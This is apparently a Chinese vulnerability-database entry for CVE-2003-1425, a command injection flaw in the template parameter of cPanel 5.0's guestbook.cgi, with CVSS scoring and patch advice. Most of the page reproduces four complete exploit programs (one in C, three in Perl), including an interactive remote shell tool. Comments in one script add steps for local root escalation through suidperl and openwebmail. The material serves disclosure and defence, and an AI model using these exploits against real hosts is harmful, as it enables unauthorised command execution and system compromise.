CVE-2003-1425
CVSS10.0
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:54
NMCOE    

[原文]guestbook.cgi in cPanel 5.0 allows remote attackers to execute arbitrary commands via the template parameter.


[CNNVD]cPanel Guestbook.cgi远程命令执行漏洞(CNNVD-200312-108)

        
        Cpanel是一款WEB主机控制程序,允许客户通过WEB接口管理WEB帐户。
        Cpanel包含的guestbook.cgi没有正确过滤用户提交的数据,远程攻击者可以利用这个漏洞以Cpanel进程权限在系统上执行任意命令。
        guestbook.cgi由于不正确过滤SHELL元字符,攻击者提交包含类似'|command'的数据给template变量,可导致命令直接传递个SHELL执行,可能以Cpanel进程权限在系统上执行任意命令或读取任意文件。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-20 [输入验证不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1425
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1425
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-108
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/11356
(UNKNOWN)  XF  cpanel-guestbook-command-execution(11356)
http://www.securityfocus.com/bid/6882
(UNKNOWN)  BID  6882
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0087.html
(UNKNOWN)  VULNWATCH  20030218 Cpanel 5 and below remote command execution and local root vulnerabilities

- 漏洞信息

cPanel Guestbook.cgi远程命令执行漏洞
危急 输入验证
2003-12-31 00:00:00 2003-12-31 00:00:00
远程  
        
        Cpanel是一款WEB主机控制程序,允许客户通过WEB接口管理WEB帐户。
        Cpanel包含的guestbook.cgi没有正确过滤用户提交的数据,远程攻击者可以利用这个漏洞以Cpanel进程权限在系统上执行任意命令。
        guestbook.cgi由于不正确过滤SHELL元字符,攻击者提交包含类似'|command'的数据给template变量,可导致命令直接传递个SHELL执行,可能以Cpanel进程权限在系统上执行任意命令或读取任意文件。
        

- 公告与补丁

        厂商补丁:
        cPanel
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载cPanel 6.0:
        
        http://www.cpanel.net

- 漏洞信息 (22260)

cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (1) (EDBID:22260)
cgi webapps
2003-02-19 Verified
0 bob
N/A [点击下载]
source: http://www.securityfocus.com/bid/6882/info

A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script.

An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.

This vulnerability has been reported to affect cPanel version 5, previous versions may also be affected. 

/*
 * DSR-cpanel.c by bob@dtors.net
 * Vulnerbility found by Polkeyzz
 * 
 * This is a Proof of Concept exploit for
 * the cpanel 5 and below. Problem is a open()
 * in guestbook.cgi.
 * 
 * User may view any file or execute commands.
 * There also exists a local vulnerbility to
 * escalate privileges to root.
 * 
 * PoC by bob of dtors.net >>DSR-apache rewrite<<
 */
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
int main(int argc, char *argv[]) {
int sock;
char exp[75];
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *bob;
 
fprintf(stdout, "\n\tDSR-cpanel.c By bob.\n"); 
fprintf(stdout, "Proof Of Concept Code for cpanel 5.0 <\n");
fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n");
 
if(argc<3) 
  {
   fprintf(stderr, "\nUsage : %s <host> <command>\n\n", argv[0]);
   exit(1);
  } 
 
if ((bob=gethostbyname(argv[1])) == NULL)
   {
   fprintf(stderr, "Socket Error!\n\n");
   exit(1);
   }
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(bob->h_addr, (char *)&sin.sin_addr, bob->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
fprintf(stdout, "Connecting...\n");
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
     {
     fprintf(stderr, "...Problem Connecting, Exited.\n");
     exit(1);
     }
else {
snprintf(sizeof(exp)-1, "GET 
/cgi-sys/guestbook.cgi/user=cpanel&template=%s HTTP/1.1\r\nHost: 
%s\r\n\r\n" ,argv[2], argv[1]);    
write(sock,exp,strlen(exp));
fprintf(stdout, "Command sent/executed!\n\n");
close(sock);
exit (0);
}
}
		

- 漏洞信息 (22261)

cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (2) (EDBID:22261)
cgi webapps
2003-02-19 Verified
0 CaMaLeoN
N/A [点击下载]
source: http://www.securityfocus.com/bid/6882/info
 
A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script.
 
An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.
 
This vulnerability has been reported to affect cPanel version 5, previous versions may also be affected.

#!usr/bin/perl
use LWP::UserAgent
print "##########################################\n";
print "#                                        #\n";
print "#      Remote Exploit for Cpanel 5       #\n";
print "#                                        #\n";
print "##########################################\n";
print "                           C0d3r: CaMaLeoN\n";
die "Use: $0 <host> <command>\n" unless ($ARGV[1]);
$web=$ARGV[0];
$comando=$ARGV[1];
$fallos="cgi-sys/guestbook.cgi?user=cpanel&template=$comando";
$url="http://$web/$fallos";
$ua = LWP::UserAgent->new();
$request = HTTP::Request->new('HEAD', $url);
$response = $ua->request($request);
if ($response->code == 200){
                            print "Command sent.\n";
                           }
                           else
                           {
                            print "The command could not be sent.\n";
                           } 
		

- 漏洞信息 (22262)

cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (3) (EDBID:22262)
cgi webapps
2003-02-19 Verified
0 SPAX
N/A [点击下载]
source: http://www.securityfocus.com/bid/6882/info
  
A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script.
  
An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.
  
This vulnerability has been reported to affect cPanel version 5, previous versions may also be affected.

#####################################################
# cpanel-plus.pl exploit
# Spawn bash style Shell on Apache CPANEL
#
# Spabam 2003 PRIV8 code
#
# spax@zone-h.org
# This Script is currently under development
#####################################################
use strict;
use IO::Socket;
my $host;
my $port;
my $command;
my $url;
my @results;
my $probe;
my @U;
my $shit;
$U[1] = "/cgi-sys/guestbook.cgi?user=cpanel&template=|";
&intro;
&scan;
&choose;
&command;
&exit;
sub intro {
&help;
&host;
&server;
sleep 3;
};
sub host {
print "\nHost or IP : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
#print "\nPort (enter to accept 80): ";
$shit="|";
$port="80";
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};
sub server {
my $X;
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
#print "\nGet IIS string ...";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
        $output = $results[$X];
        if (defined $output){
        if ($output =~/IIS/){ $webserver = "iis" };
        };
};
if ($webserver ne "iis"){
#print "\a\a\n\nWARNING : UNABLE TO GET IIS STRING.";
#print "\nThis Server may not be running Micro\$oft IIS WebServer";
#print "\n\n\nContinue anyway? ... [Y/N]";
my $choice = "y";
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print "\n\nOK";
        };
};
sub scan {
my $status = "not_vulnerable";
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
#print "\nScanning $host on port $port ...";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) {
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = "1";
                              $status = "vulnerable";
                              };
        };
if ($flag eq "0") {
#print "\nNo URL $loop...";
}else{
print "\a\a\a\n$host VULNERABLE TO URL $loop !!!";
     };
};
if ($status eq "not_vulnerable"){

#"SORRY $host is NOT Vulnerable to this Exploit.";
                                };
};
sub choose {
#print "\nSelect a URL (type 0 to input)";
my $choice="0";
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
#print "\nURL: HTTP://$host$url";
};
sub other {
#print "\nURL [minus command] eg: HTTP://$host\/scripts\/cmd.exe?\/+";
#print "\nHTTP://$host";
my $other = "/cgi-sys/guestbook.cgi?user=cpanel&template=|";
chomp $other;
$U[0] = $other;
};
sub command {
while ($command !~/quit/i) {
#print "\nHELP QUIT URL SCAN Or Command eg dir C: ";
print "\n[$host]\$ ";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose };
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g;
#print "HTTP://$host$url$command";
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};
sub connect {
my $connection = IO::Socket::INET->new (
                                Proto => "tcp",
                                PeerAddr => "$host",
                                PeerPort => "$port",
                                ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command$shiz HTTP/1.1\r\nHost: $host\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";
};

while ( <$connection> ) {
                        @results = <$connection>;
                         };
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};
sub output{
#print "\nOUTPUT FROM $host. \n\n";
my $display;
if ($probe eq "string") {
                        my $X;
                        for ($X=0; $X<=10; $X++) {
                        $display = $results[$X];
                        if (defined $display){print "$display";};
                        sleep 1;
                                };
                        }else{
                        foreach $display (@results){
                            print "$display";
                            sleep 1;
                                };
                          };
};
sub exit{
print "\n\n\n
SPABAM 2003.";
print "\nspabam.tk spax\@zone-h.org";
print "\n\n\n";
exit;
};
sub help {
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\n
        CPANEL-PLUS 1.1 by SPABAM spax 2003";
print "\n
";
print "\n A CPANEL EXPLOIT WHICH SPAWN A BASH STYLE SHELL";
print "\n
note.. web directory is normally /var/www/html";
print "\n";
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "\n\n\n\n\n\n\n\n\n\n\n\n";
};
		

- 漏洞信息 (22263)

cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (4) (EDBID:22263)
cgi webapps
2003-02-19 Verified
0 pokleyzz
N/A [点击下载]
source: http://www.securityfocus.com/bid/6882/info
   
A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script.
   
An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.
   
This vulnerability has been reported to affect cPanel version 5, previous versions may also be affected.

#!/usr/bin/perl
#
# ------- start here -------
#
# Bug Founded by: pokleyzz
#
# Cpanel is web hosting control panel which allow client manage their web account through
# web interface. Most of the application are written in perl and  compiled to binary.
#
# Details
# =======
# There is multiple vurnerabilities in this package as describe below.
#
# 1) Remote command Execution in guestbook.cgi (/usr/local/cpanel/cgi-sys/guestbook.cgi)
#
# There is classic perl open function vulnerability in template variable which allow any
# user to read any file or run command  as valid system user which assign to specific url
# in apache configuration.
#
# 2) Local privileges escalation (root)
#
# Cpanel come with openwebmail packages as one of web base email reader which suid root.
# In the system with suid perl install perfectly (with suid mode turn on) local user may
# include their own perl script when running openwebmail script (oom) through suidperl.
#
# Openwebmail will append perl include path (@INC) through SCRIPT_FILENAME environment variable,
# then include some file when execute.
#
# /usr/local/cpanel/base/openwebmail/oom line 14
#
# if ( $ENV{'SCRIPT_FILENAME'} =~ m!^(.*?)/[\w\d\-]+\.pl! || $0 =~ m!^(.*?)/[\w\d\-]+\.pl! ) { $SCRIPT_DIR=$1; }
# if (!$SCRIPT_DIR) { print "Content-type: text/html\n\n\$SCRIPT_DIR not set in CGI script!\n"; exit 0; }
# push (@INC, $SCRIPT_DIR, ".");
# .
# .
# .
# require "openwebmail-shared.pl";
#
# proof of concept:
# i) Create file openwebmail-shared.pl contain perl script you want to execute.
# ii) Set SCRIPT_FILENAME point to full path of openwebmail-shared.pl file you just create.
# iii) exec oom script (ex: suidperl -T /usr/local/cpanel/base/openwebmail/oom )
#
# -------- cut here --------
#
# coded by cyzek. cyzek@efnet
# thanks for p0ng p0ng@brasnet.org

$url = $ARGV[0];
$cmd = $ARGV[1];

if(@ARGV != 2){
        print " jozc.pl - Cpanel 5 and below Remote Exploit by cyzek.\n";
        print " use %20 for spaces.\n";
        print " usage: $0 <host> <cmd>\n";
        exit;
}

use IO::Socket::INET;
$rem = IO::Socket::INET->new(
Proto       => "tcp",
PeerAddr    => $url,
PeerPort    => "80");

if ($rem) {
        print $rem "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|$cmd| HTTP/1.0 \n\r\n\r\n\r";
        @resp = <$rem>;
}
print "@resp\n\n";

		

- 漏洞信息

4220
cPanel guestbook.cgi template Variable Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

cPanel contains a flaw that allows a remote attacker to execute arbitrary commands. The issue is due to the "guestbook.cgi" script not properly sanitizing input to the "template" variable. By providing a specially crafted argument to this variable, an attacker can execute arbitrary commands.

- 时间线

2003-02-19 2003-02-14
2003-02-19 Unknow

- 解决方案

Upgrade to version 6.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站